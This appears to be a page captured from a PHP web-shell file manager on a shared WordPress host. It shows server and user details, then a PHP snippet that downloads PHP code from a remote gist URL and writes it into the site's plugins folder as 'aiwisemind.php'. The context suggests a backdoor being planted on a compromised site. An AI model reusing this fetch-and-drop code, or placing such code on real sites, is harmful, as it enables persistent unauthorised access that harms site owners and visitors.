|
Server : LiteSpeed System : Linux premium152.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64 User : idesfsze ( 1473) PHP Version : 7.4.33 Disable Function : NONE Directory : /home/idesfsze/public_html/wp-content/ |
echo "Installing aiwisemind plugin...";
$response = wp_remote_get("https://gist.githubusercontent.com/NasirNobin/c88a5dd699ce62ac1c298c15e1ba1af4/raw/2cd9dd637095ebfc28663f5938cbfe9894660759/aiwisemind-helper-0.0.3.php");
file_put_contents(ABSPATH.'wp-content/plugins/aiwisemind.php', wp_remote_retrieve_body($response));
if(file_exists(ABSPATH.'wp-content/plugins/aiwisemind.php')) {
echo "aiwisemind plugin installed successfully!";
} else {
echo "aiwisemind plugin installation failed!";
}